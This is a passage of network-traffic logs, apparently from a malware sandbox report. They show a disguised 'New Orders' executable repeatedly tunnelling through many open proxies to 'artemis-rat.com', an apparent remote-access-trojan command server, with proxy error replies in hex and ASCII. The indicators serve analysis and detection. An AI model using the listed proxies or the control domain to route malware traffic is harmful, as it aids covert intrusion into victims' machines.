                                                                                        Mar 11, 2024 16:16:56.538963079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.129403114 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192192.168.2.953451116.203.28.43807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.436001062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.755335093 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1193192.168.2.95344249.13.131.163807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.436711073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.746268034 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1194192.168.2.951130132.148.128.88266067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.444888115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476636887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.576396942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.664213896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1195192.168.2.95345747.243.205.131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.449820995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1196192.168.2.953529104.27.122.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.449826956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.604094982 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1197192.168.2.953468208.102.51.6582087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.460006952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1198192.168.2.95100620.33.5.2788887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.462483883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616578102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.229362965 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1199192.168.2.95347714.103.26.5380007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.466597080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1200192.168.2.953378103.190.54.141807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.467421055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1201192.168.2.952822180.104.0.16110807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.467928886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1202192.168.2.95338843.231.22.228807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.472090960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1203192.168.2.95346213.229.47.109807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.472309113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.798017979 CET224INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:14:12 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Connection: close
                                                                                        Content-Length: 12
                                                                                        X-Kong-Response-Latency: -2.0980834960938e-05
                                                                                        Server: kong/2.8.1
                                                                                        Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                        Data Ascii: Bad request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1204192.168.2.953418123.126.158.50807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.473944902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1205192.168.2.952717185.132.242.21280837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.477365971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1206192.168.2.952910162.241.45.22635017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.477511883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.667881012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.773730993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1207192.168.2.95341689.218.8.15210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.478889942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.324182987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1208192.168.2.953484135.125.225.7580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.478893042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.166176081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106761932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.998075962 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1209192.168.2.95347251.89.14.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.531141996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.211751938 CET176INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Length: 19
                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                        Data Ascii: 404 page not found


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1210192.168.2.953473203.89.8.107807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.533606052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.324033022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.933398962 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1211192.168.2.953466139.59.99.83807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.534162045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.873922110 CET891INHTTP/1.1 400 Bad Request
                                                                                        content-type: text/html
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        content-length: 679
                                                                                        date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        server: LiteSpeed
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1212192.168.2.953458177.67.136.24141537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.538579941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
